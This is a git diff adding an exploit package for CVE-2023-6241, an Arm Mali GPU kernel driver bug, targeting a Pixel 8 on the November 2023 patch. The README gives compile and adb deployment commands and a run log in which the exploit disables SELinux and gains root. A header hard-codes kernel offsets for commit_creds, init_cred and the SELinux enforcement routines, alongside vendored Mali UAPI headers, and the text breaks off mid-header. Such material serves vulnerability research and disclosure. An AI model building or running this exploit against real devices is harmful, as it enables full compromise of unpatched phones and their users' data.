diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/README.md b/SecurityExploits/Android/Mali/CVE_2023_6241/README.md
new file mode 100644
index 0000000..0e37f5f
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2023_6241/README.md
@@ -0,0 +1,40 @@
+## Exploit for CVE-2023-6241
+
+The write up can be found [here](). This is a bug in the Arm Mali kernel driver that I reported in November 2023. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
+
+The exploit is tested on the Google Pixel 8 with the November 2023 patch (`UD1A.231105.004`). It needs to be compiled against the OpenCL headers and linked with the OpenCL library `libGLES_mali.so`. The library can be found on a Pixel 8 device at `vendor/lib64/egl/libGLES_mali.so`, and the OpenCL header files can be found in the KhronosGroup's [OpenCL-Headers repository](https://github.com/KhronosGroup/OpenCL-Headers). The specific header version that I used was [v2023.04.17](https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17), although other versions should also work. For reference, I used the following command to compile with clang from NDK r26b:
+
+```
+android-ndk-r26b/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android34-clang -DSHELL -DCL_TARGET_OPENCL_VERSION=300 -I. -L. mali_jit_csf.c mem_read_write.c mempool_utils.c -lGLES_mali -o mali_jit_csf
+```
+
+At run time the exploit needs to load `libGLES_mali.so`, which can be done by setting `LD_LIBRARY_PATH` to `/vendor/lib64/egl`. The exploit rarely fails, and even when it does, it does not normally corrupt or crash the system, so it can simply be rerun. If successful, it should disable SELinux and gain root.
+
+```
+shiba:/data/local/tmp $ LD_LIBRARY_PATH=/vendor/lib64/egl ./mali_jit_csf
+mali_fd 3
+corrupted_jit_addr 6000001000
+kernel success
+kernel success
+queue kernel
+jit_grow addr 6000001000
+Size after grow: 22f6
+Final grow size: 23c7
+keep alive jit_addr 60023d1000
+Size after free: 21fd, trim_level 6
+writing to gpu_va 6002301000
+found reused page 5fffef6000, 0
+pgd entry found at index 0 40000899bbc443
+overwrite addr : 5ffff00b50 b50
+overwrite addr : 5fffb00b50 b50
+overwrite addr : 5fff900b50 b50
+overwrite addr : 5ffff00714 714
+overwrite addr : 5fffb00714 714
+overwrite addr : 5fff900714 714
+result 50
+clean up
+```
+
+When run for the first time, the exploit sometimes stalls after printing the last `overwrite addr` message. If that happens (stalled for more than 10 seconds; pausing for a few seconds is normal), simply kill the exploit and rerun it. It should not stall the second time.
+
+To test the exploit with MTE enabled, follow [these instructions](https://outflux.net/blog/archives/2023/10/26/enable-mte-on-pixel-8/) to enable kernel MTE.
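For reference, the commands below show one possible way to fetch `libGLES_mali.so` from the device for linking on the host and to deploy the compiled exploit over `adb`. This is only a sketch, not part of the patch: it assumes a Pixel 8 connected over adb and the output name `mali_jit_csf` from the compile command in the README above.

```
# Grab the OpenCL library from the device so the exploit can be linked against it on the host.
adb pull /vendor/lib64/egl/libGLES_mali.so .

# After compiling with the clang command from the README, push the exploit to the device and run it.
adb push mali_jit_csf /data/local/tmp/
adb shell chmod +x /data/local/tmp/mali_jit_csf
adb shell "cd /data/local/tmp && LD_LIBRARY_PATH=/vendor/lib64/egl ./mali_jit_csf"
```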
diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/firmware_offsets.h b/SecurityExploits/Android/Mali/CVE_2023_6241/firmware_offsets.h new file mode 100644 index 0000000..30f6699 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/firmware_offsets.h @@ -0,0 +1,16 @@ +#ifndef FIRMWARE_OFFSETS_H +#define FIRMWARE_OFFSETS_H + +#define AVC_DENY_2311 0x806b50 + +#define SEL_READ_ENFORCE_2311 0x818714 + +#define INIT_CRED_2311 0x271bfa8 + +#define COMMIT_CREDS_2311 0x167b40 + +#define ADD_COMMIT_2311 0x912d0108 //add x8, x8, #0xb40 + +#define ADD_INIT_2311 0x913ea000 //add x0, x0, #0xfa8 + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/log_utils.h b/SecurityExploits/Android/Mali/CVE_2023_6241/log_utils.h new file mode 100644 index 0000000..0a4172c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/log_utils.h @@ -0,0 +1,11 @@ +#ifndef LOG_UTILS_H +#define LOG_UTILS_H + +#ifdef SHELL +#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__) +#else +#include +#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__) +#endif + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_common_kernel.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_common_kernel.h new file mode 100644 index 0000000..23bed51 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_common_kernel.h @@ -0,0 +1,228 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_BASE_COMMON_KERNEL_H_ +#define _UAPI_BASE_COMMON_KERNEL_H_ + +#include +#include "mali_base_kernel.h" + +#define LOCAL_PAGE_SHIFT 12 + +#define BASE_GPU_NUM_TEXTURE_FEATURES_REGISTERS 4 + +/* Memory allocation, access/hint flags & mask. + * + * See base_mem_alloc_flags. + */ + +/* IN */ +/* Read access CPU side + */ +#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0) + +/* Write access CPU side + */ +#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1) + +/* Read access GPU side + */ +#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2) + +/* Write access GPU side + */ +#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3) + +/* Execute allowed on the GPU side + */ +#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4) + +/* Will be permanently mapped in kernel space. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5) + +/* The allocation will completely reside within the same 4GB chunk in the GPU + * virtual space. 
+ * Since this flag is primarily required only for the TLS memory which will + * not be used to contain executable code and also not used for Tiler heap, + * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags. + */ +#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6) + +/* Userspace is not allowed to free this memory. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7) + +/* Grow backing store on GPU Page Fault + */ +#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9) + +/* Page coherence Outer shareable, if available + */ +#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10) + +/* Page coherence Inner shareable + */ +#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11) + +/* IN/OUT */ +/* Should be cached on the CPU, returned if actually cached + */ +#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12) + +/* IN/OUT */ +/* Must have same VA on both the GPU and the CPU + */ +#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13) + +/* OUT */ +/* Must call mmap to acquire a GPU address for the allocation + */ +#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14) + +/* IN */ +/* Page coherence Outer shareable, required. + */ +#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15) + +/* Protected memory + */ +#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16) + +/* Not needed physical memory + */ +#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17) + +/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the + * addresses to be the same + */ +#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18) + +/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu + * mode. Some components within the GPU might only be able to access memory + * that is GPU cacheable. Refer to the specific GPU implementation for more + * details. The 3 shareability flags will be ignored for GPU uncached memory. + * If used while importing USER_BUFFER type memory, then the import will fail + * if the memory is not aligned to GPU and CPU cache line width. + */ +#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21) + +/* + * Bits [22:25] for group_id (0~15). + * + * base_mem_group_id_set() should be used to pack a memory group ID into a + * base_mem_alloc_flags value instead of accessing the bits directly. + * base_mem_group_id_get() should be used to extract the memory group ID from + * a base_mem_alloc_flags value. + */ +#define BASEP_MEM_GROUP_ID_SHIFT 22 +#define BASE_MEM_GROUP_ID_MASK ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT) + +/* Must do CPU cache maintenance when imported memory is mapped/unmapped + * on GPU. Currently applicable to dma-buf type only. + */ +#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26) + +/* OUT */ +/* Kernel side cache sync ops required */ +#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28) + +/* Number of bits used as flags for base memory management + * + * Must be kept in sync with the base_mem_alloc_flags flags + */ +#define BASE_MEM_FLAGS_NR_BITS 30 + +/* A mask for all output bits, excluding IN/OUT bits. + */ +#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP + +/* A mask for all input bits, including IN/OUT bits. + */ +#define BASE_MEM_FLAGS_INPUT_MASK \ + (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK) + +/* Special base mem handles. 
+ */ +#define BASEP_MEM_INVALID_HANDLE (0ul) +#define BASE_MEM_MMU_DUMP_HANDLE (1ul << LOCAL_PAGE_SHIFT) +#define BASE_MEM_TRACE_BUFFER_HANDLE (2ul << LOCAL_PAGE_SHIFT) +#define BASE_MEM_MAP_TRACKING_HANDLE (3ul << LOCAL_PAGE_SHIFT) +#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ul << LOCAL_PAGE_SHIFT) +/* reserved handles ..-47< for future special handles */ +#define BASE_MEM_COOKIE_BASE (64ul << LOCAL_PAGE_SHIFT) +#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << LOCAL_PAGE_SHIFT) + BASE_MEM_COOKIE_BASE) + +/* Flags to pass to ::base_context_init. + * Flags can be ORed together to enable multiple things. + * + * These share the same space as BASEP_CONTEXT_FLAG_*, and so must + * not collide with them. + */ +typedef __u32 base_context_create_flags; + +/* Flags for base context */ + +/* No flags set */ +#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0) + +/* Base context is embedded in a cctx object (flag used for CINSTR + * software counter macros) + */ +#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0) + +/* Base context is a 'System Monitor' context for Hardware counters. + * + * One important side effect of this is that job submission is disabled. + */ +#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED ((base_context_create_flags)1 << 1) + +/* Bit-shift used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3) + +/* Bitmask used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \ + ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT) + +/* Bitpattern describing the base_context_create_flags that can be + * passed to the kernel + */ +#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \ + (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | BASEP_CONTEXT_MMU_GROUP_ID_MASK) + +/* Flags for base tracepoint + */ + +/* Enable additional tracepoints for latency measurements (TL_ATOM_READY, + * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST) + */ +#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0) + +/* Indicate that job dumping is enabled. This could affect certain timers + * to account for the performance impact. + */ +#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1) + +#endif /* _UAPI_BASE_COMMON_KERNEL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_csf_kernel.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_csf_kernel.h new file mode 100644 index 0000000..141b090 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_csf_kernel.h @@ -0,0 +1,608 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2020-2023 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. 
+ * + */ + +#ifndef _UAPI_BASE_CSF_KERNEL_H_ +#define _UAPI_BASE_CSF_KERNEL_H_ + +#include +#include "mali_base_common_kernel.h" + +/* Memory allocation, access/hint flags & mask specific to CSF GPU. + * + * See base_mem_alloc_flags. + */ + +/* Must be FIXED memory. */ +#define BASE_MEM_FIXED ((base_mem_alloc_flags)1 << 8) + +/* CSF event memory + * + * If Outer shareable coherence is not specified or not available, then on + * allocation kbase will automatically use the uncached GPU mapping. + * There is no need for the client to specify BASE_MEM_UNCACHED_GPU + * themselves when allocating memory with the BASE_MEM_CSF_EVENT flag. + * + * This memory requires a permanent mapping + * + * See also kbase_reg_needs_kernel_mapping() + */ +#define BASE_MEM_CSF_EVENT ((base_mem_alloc_flags)1 << 19) + +#define BASE_MEM_RESERVED_BIT_20 ((base_mem_alloc_flags)1 << 20) + + +/* Must be FIXABLE memory: its GPU VA will be determined at a later point, + * at which time it will be at a fixed GPU VA. + */ +#define BASE_MEM_FIXABLE ((base_mem_alloc_flags)1 << 29) + +/* Note that the number of bits used for base_mem_alloc_flags + * must be less than BASE_MEM_FLAGS_NR_BITS !!! + */ + +/* A mask of all the flags which are only valid for allocations within kbase, + * and may not be passed from user space. + */ +#define BASEP_MEM_FLAGS_KERNEL_ONLY \ + (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE) + +/* A mask of all currently reserved flags + */ +#define BASE_MEM_FLAGS_RESERVED BASE_MEM_RESERVED_BIT_20 + +/* Special base mem handles specific to CSF. + */ +#define BASEP_MEM_CSF_USER_REG_PAGE_HANDLE (47ul << LOCAL_PAGE_SHIFT) +#define BASEP_MEM_CSF_USER_IO_PAGES_HANDLE (48ul << LOCAL_PAGE_SHIFT) + +#define KBASE_CSF_NUM_USER_IO_PAGES_HANDLE \ + ((BASE_MEM_COOKIE_BASE - BASEP_MEM_CSF_USER_IO_PAGES_HANDLE) >> \ + LOCAL_PAGE_SHIFT) + +/* Valid set of just-in-time memory allocation flags */ +#define BASE_JIT_ALLOC_VALID_FLAGS ((__u8)0) + +/* flags for base context specific to CSF */ + +/* Base context creates a CSF event notification thread. + * + * The creation of a CSF event notification thread is conditional but + * mandatory for the handling of CSF events. + */ +#define BASE_CONTEXT_CSF_EVENT_THREAD ((base_context_create_flags)1 << 2) + +/* Bitpattern describing the ::base_context_create_flags that can be + * passed to base_context_init() + */ +#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \ + (BASE_CONTEXT_CCTX_EMBEDDED | \ + BASE_CONTEXT_CSF_EVENT_THREAD | \ + BASEP_CONTEXT_CREATE_KERNEL_FLAGS) + +/* Flags for base tracepoint specific to CSF */ + +/* Enable KBase tracepoints for CSF builds */ +#define BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS (1 << 2) + +/* Enable additional CSF Firmware side tracepoints */ +#define BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS (1 << 3) + +#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \ + BASE_TLSTREAM_JOB_DUMPING_ENABLED | \ + BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS | \ + BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS) + +/* Number of pages mapped into the process address space for a bound GPU + * command queue. A pair of input/output pages and a Hw doorbell page + * are mapped to enable direct submission of commands to Hw. 
+ */ +#define BASEP_QUEUE_NR_MMAP_USER_PAGES ((size_t)3) + +#define BASE_QUEUE_MAX_PRIORITY (15U) + +/* Sync32 object fields definition */ +#define BASEP_EVENT32_VAL_OFFSET (0U) +#define BASEP_EVENT32_ERR_OFFSET (4U) +#define BASEP_EVENT32_SIZE_BYTES (8U) + +/* Sync64 object fields definition */ +#define BASEP_EVENT64_VAL_OFFSET (0U) +#define BASEP_EVENT64_ERR_OFFSET (8U) +#define BASEP_EVENT64_SIZE_BYTES (16U) + +/* Sync32 object alignment, equal to its size */ +#define BASEP_EVENT32_ALIGN_BYTES (8U) + +/* Sync64 object alignment, equal to its size */ +#define BASEP_EVENT64_ALIGN_BYTES (16U) + +/* The upper limit for number of objects that could be waited/set per command. + * This limit is now enforced as internally the error inherit inputs are + * converted to 32-bit flags in a __u32 variable occupying a previously padding + * field. + */ +#define BASEP_KCPU_CQS_MAX_NUM_OBJS ((size_t)32) + +/* CSF CSI EXCEPTION_HANDLER_FLAGS */ +#define BASE_CSF_TILER_OOM_EXCEPTION_FLAG (1u << 0) +#define BASE_CSF_EXCEPTION_HANDLER_FLAGS_MASK (BASE_CSF_TILER_OOM_EXCEPTION_FLAG) + +/** + * enum base_kcpu_command_type - Kernel CPU queue command type. + * @BASE_KCPU_COMMAND_TYPE_FENCE_SIGNAL: fence_signal, + * @BASE_KCPU_COMMAND_TYPE_FENCE_WAIT: fence_wait, + * @BASE_KCPU_COMMAND_TYPE_CQS_WAIT: cqs_wait, + * @BASE_KCPU_COMMAND_TYPE_CQS_SET: cqs_set, + * @BASE_KCPU_COMMAND_TYPE_CQS_WAIT_OPERATION: cqs_wait_operation, + * @BASE_KCPU_COMMAND_TYPE_CQS_SET_OPERATION: cqs_set_operation, + * @BASE_KCPU_COMMAND_TYPE_MAP_IMPORT: map_import, + * @BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT: unmap_import, + * @BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT_FORCE: unmap_import_force, + * @BASE_KCPU_COMMAND_TYPE_JIT_ALLOC: jit_alloc, + * @BASE_KCPU_COMMAND_TYPE_JIT_FREE: jit_free, + * @BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND: group_suspend, + * @BASE_KCPU_COMMAND_TYPE_ERROR_BARRIER: error_barrier, + */ +enum base_kcpu_command_type { + BASE_KCPU_COMMAND_TYPE_FENCE_SIGNAL, + BASE_KCPU_COMMAND_TYPE_FENCE_WAIT, + BASE_KCPU_COMMAND_TYPE_CQS_WAIT, + BASE_KCPU_COMMAND_TYPE_CQS_SET, + BASE_KCPU_COMMAND_TYPE_CQS_WAIT_OPERATION, + BASE_KCPU_COMMAND_TYPE_CQS_SET_OPERATION, + BASE_KCPU_COMMAND_TYPE_MAP_IMPORT, + BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT, + BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT_FORCE, + BASE_KCPU_COMMAND_TYPE_JIT_ALLOC, + BASE_KCPU_COMMAND_TYPE_JIT_FREE, + BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND, + BASE_KCPU_COMMAND_TYPE_ERROR_BARRIER +}; + +/** + * enum base_queue_group_priority - Priority of a GPU Command Queue Group. + * @BASE_QUEUE_GROUP_PRIORITY_HIGH: GPU Command Queue Group is of high + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_MEDIUM: GPU Command Queue Group is of medium + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_LOW: GPU Command Queue Group is of low + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_REALTIME: GPU Command Queue Group is of real-time + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_COUNT: Number of GPU Command Queue Group + * priority levels. + * + * Currently this is in order of highest to lowest, but if new levels are added + * then those new levels may be out of order to preserve the ABI compatibility + * with previous releases. At that point, ensure assignment to + * the 'priority' member in &kbase_queue_group is updated to ensure it remains + * a linear ordering. + * + * There should be no gaps in the enum, otherwise use of + * BASE_QUEUE_GROUP_PRIORITY_COUNT in kbase must be updated. 
+ */ +enum base_queue_group_priority { + BASE_QUEUE_GROUP_PRIORITY_HIGH = 0, + BASE_QUEUE_GROUP_PRIORITY_MEDIUM, + BASE_QUEUE_GROUP_PRIORITY_LOW, + BASE_QUEUE_GROUP_PRIORITY_REALTIME, + BASE_QUEUE_GROUP_PRIORITY_COUNT +}; + +struct base_kcpu_command_fence_info { + __u64 fence; +}; + +struct base_cqs_wait_info { + __u64 addr; + __u32 val; + __u32 padding; +}; + +struct base_kcpu_command_cqs_wait_info { + __u64 objs; + __u32 nr_objs; + __u32 inherit_err_flags; +}; + +struct base_cqs_set { + __u64 addr; +}; + +struct base_kcpu_command_cqs_set_info { + __u64 objs; + __u32 nr_objs; + __u32 padding; +}; + +/** + * typedef basep_cqs_data_type - Enumeration of CQS Data Types + * + * @BASEP_CQS_DATA_TYPE_U32: The Data Type of a CQS Object's value + * is an unsigned 32-bit integer + * @BASEP_CQS_DATA_TYPE_U64: The Data Type of a CQS Object's value + * is an unsigned 64-bit integer + */ +typedef enum PACKED { + BASEP_CQS_DATA_TYPE_U32 = 0, + BASEP_CQS_DATA_TYPE_U64 = 1, +} basep_cqs_data_type; + +/** + * typedef basep_cqs_wait_operation_op - Enumeration of CQS Object Wait + * Operation conditions + * + * @BASEP_CQS_WAIT_OPERATION_LE: CQS Wait Operation indicating that a + * wait will be satisfied when a CQS Object's + * value is Less than or Equal to + * the Wait Operation value + * @BASEP_CQS_WAIT_OPERATION_GT: CQS Wait Operation indicating that a + * wait will be satisfied when a CQS Object's + * value is Greater than the Wait Operation value + */ +typedef enum { + BASEP_CQS_WAIT_OPERATION_LE = 0, + BASEP_CQS_WAIT_OPERATION_GT = 1, +} basep_cqs_wait_operation_op; + +struct base_cqs_wait_operation_info { + __u64 addr; + __u64 val; + __u8 operation; + __u8 data_type; + __u8 padding[6]; +}; + +/** + * struct base_kcpu_command_cqs_wait_operation_info - structure which contains information + * about the Timeline CQS wait objects + * + * @objs: An array of Timeline CQS waits. + * @nr_objs: Number of Timeline CQS waits in the array. + * @inherit_err_flags: Bit-pattern for the CQSs in the array who's error field + * to be served as the source for importing into the + * queue's error-state. + */ +struct base_kcpu_command_cqs_wait_operation_info { + __u64 objs; + __u32 nr_objs; + __u32 inherit_err_flags; +}; + +/** + * typedef basep_cqs_set_operation_op - Enumeration of CQS Set Operations + * + * @BASEP_CQS_SET_OPERATION_ADD: CQS Set operation for adding a value + * to a synchronization object + * @BASEP_CQS_SET_OPERATION_SET: CQS Set operation for setting the value + * of a synchronization object + */ +typedef enum { + BASEP_CQS_SET_OPERATION_ADD = 0, + BASEP_CQS_SET_OPERATION_SET = 1, +} basep_cqs_set_operation_op; + +struct base_cqs_set_operation_info { + __u64 addr; + __u64 val; + __u8 operation; + __u8 data_type; + __u8 padding[6]; +}; + +/** + * struct base_kcpu_command_cqs_set_operation_info - structure which contains information + * about the Timeline CQS set objects + * + * @objs: An array of Timeline CQS sets. + * @nr_objs: Number of Timeline CQS sets in the array. + * @padding: Structure padding, unused bytes. + */ +struct base_kcpu_command_cqs_set_operation_info { + __u64 objs; + __u32 nr_objs; + __u32 padding; +}; + +/** + * struct base_kcpu_command_import_info - structure which contains information + * about the imported buffer. + * + * @handle: Address of imported user buffer. + */ +struct base_kcpu_command_import_info { + __u64 handle; +}; + +/** + * struct base_kcpu_command_jit_alloc_info - structure which contains + * information about jit memory allocation. 
+ * + * @info: An array of elements of the + * struct base_jit_alloc_info type. + * @count: The number of elements in the info array. + * @padding: Padding to a multiple of 64 bits. + */ +struct base_kcpu_command_jit_alloc_info { + __u64 info; + __u8 count; + __u8 padding[7]; +}; + +/** + * struct base_kcpu_command_jit_free_info - structure which contains + * information about jit memory which is to be freed. + * + * @ids: An array containing the JIT IDs to free. + * @count: The number of elements in the ids array. + * @padding: Padding to a multiple of 64 bits. + */ +struct base_kcpu_command_jit_free_info { + __u64 ids; + __u8 count; + __u8 padding[7]; +}; + +/** + * struct base_kcpu_command_group_suspend_info - structure which contains + * suspend buffer data captured for a suspended queue group. + * + * @buffer: Pointer to an array of elements of the type char. + * @size: Number of elements in the @buffer array. + * @group_handle: Handle to the mapping of CSG. + * @padding: padding to a multiple of 64 bits. + */ +struct base_kcpu_command_group_suspend_info { + __u64 buffer; + __u32 size; + __u8 group_handle; + __u8 padding[3]; +}; + + +/** + * struct base_kcpu_command - kcpu command. + * @type: type of the kcpu command, one enum base_kcpu_command_type + * @padding: padding to a multiple of 64 bits + * @info: structure which contains information about the kcpu command; + * actual type is determined by @p type + * @info.fence: Fence + * @info.cqs_wait: CQS wait + * @info.cqs_set: CQS set + * @info.cqs_wait_operation: CQS wait operation + * @info.cqs_set_operation: CQS set operation + * @info.import: import + * @info.jit_alloc: JIT allocation + * @info.jit_free: JIT deallocation + * @info.suspend_buf_copy: suspend buffer copy + * @info.sample_time: sample time + * @info.padding: padding + */ +struct base_kcpu_command { + __u8 type; + __u8 padding[sizeof(__u64) - sizeof(__u8)]; + union { + struct base_kcpu_command_fence_info fence; + struct base_kcpu_command_cqs_wait_info cqs_wait; + struct base_kcpu_command_cqs_set_info cqs_set; + struct base_kcpu_command_cqs_wait_operation_info cqs_wait_operation; + struct base_kcpu_command_cqs_set_operation_info cqs_set_operation; + struct base_kcpu_command_import_info import; + struct base_kcpu_command_jit_alloc_info jit_alloc; + struct base_kcpu_command_jit_free_info jit_free; + struct base_kcpu_command_group_suspend_info suspend_buf_copy; + __u64 padding[2]; /* No sub-struct should be larger */ + } info; +}; + +/** + * struct basep_cs_stream_control - CSI capabilities. + * + * @features: Features of this stream + * @padding: Padding to a multiple of 64 bits. + */ +struct basep_cs_stream_control { + __u32 features; + __u32 padding; +}; + +/** + * struct basep_cs_group_control - CSG interface capabilities. + * + * @features: Features of this group + * @stream_num: Number of streams in this group + * @suspend_size: Size in bytes of the suspend buffer for this group + * @padding: Padding to a multiple of 64 bits. + */ +struct basep_cs_group_control { + __u32 features; + __u32 stream_num; + __u32 suspend_size; + __u32 padding; +}; + +/** + * struct base_gpu_queue_group_error_fatal_payload - Unrecoverable fault + * error information associated with GPU command queue group. + * + * @sideband: Additional information of the unrecoverable fault. + * @status: Unrecoverable fault information. + * This consists of exception type (least significant byte) and + * data (remaining bytes). One example of exception type is + * CS_INVALID_INSTRUCTION (0x49). 
+ * @padding: Padding to make multiple of 64bits + */ +struct base_gpu_queue_group_error_fatal_payload { + __u64 sideband; + __u32 status; + __u32 padding; +}; + +/** + * struct base_gpu_queue_error_fatal_payload - Unrecoverable fault + * error information related to GPU command queue. + * + * @sideband: Additional information about this unrecoverable fault. + * @status: Unrecoverable fault information. + * This consists of exception type (least significant byte) and + * data (remaining bytes). One example of exception type is + * CS_INVALID_INSTRUCTION (0x49). + * @csi_index: Index of the CSF interface the queue is bound to. + * @padding: Padding to make multiple of 64bits + */ +struct base_gpu_queue_error_fatal_payload { + __u64 sideband; + __u32 status; + __u8 csi_index; + __u8 padding[3]; +}; + +/** + * enum base_gpu_queue_group_error_type - GPU Fatal error type. + * + * @BASE_GPU_QUEUE_GROUP_ERROR_FATAL: Fatal error associated with GPU + * command queue group. + * @BASE_GPU_QUEUE_GROUP_QUEUE_ERROR_FATAL: Fatal error associated with GPU + * command queue. + * @BASE_GPU_QUEUE_GROUP_ERROR_TIMEOUT: Fatal error associated with + * progress timeout. + * @BASE_GPU_QUEUE_GROUP_ERROR_TILER_HEAP_OOM: Fatal error due to running out + * of tiler heap memory. + * @BASE_GPU_QUEUE_GROUP_ERROR_FATAL_COUNT: The number of fatal error types + * + * This type is used for &struct_base_gpu_queue_group_error.error_type. + */ +enum base_gpu_queue_group_error_type { + BASE_GPU_QUEUE_GROUP_ERROR_FATAL = 0, + BASE_GPU_QUEUE_GROUP_QUEUE_ERROR_FATAL, + BASE_GPU_QUEUE_GROUP_ERROR_TIMEOUT, + BASE_GPU_QUEUE_GROUP_ERROR_TILER_HEAP_OOM, + BASE_GPU_QUEUE_GROUP_ERROR_FATAL_COUNT +}; + +/** + * struct base_gpu_queue_group_error - Unrecoverable fault information + * @error_type: Error type of @base_gpu_queue_group_error_type + * indicating which field in union payload is filled + * @padding: Unused bytes for 64bit boundary + * @payload: Input Payload + * @payload.fatal_group: Unrecoverable fault error associated with + * GPU command queue group + * @payload.fatal_queue: Unrecoverable fault error associated with command queue + */ +struct base_gpu_queue_group_error { + __u8 error_type; + __u8 padding[7]; + union { + struct base_gpu_queue_group_error_fatal_payload fatal_group; + struct base_gpu_queue_error_fatal_payload fatal_queue; + } payload; +}; + +/** + * enum base_csf_notification_type - Notification type + * + * @BASE_CSF_NOTIFICATION_EVENT: Notification with 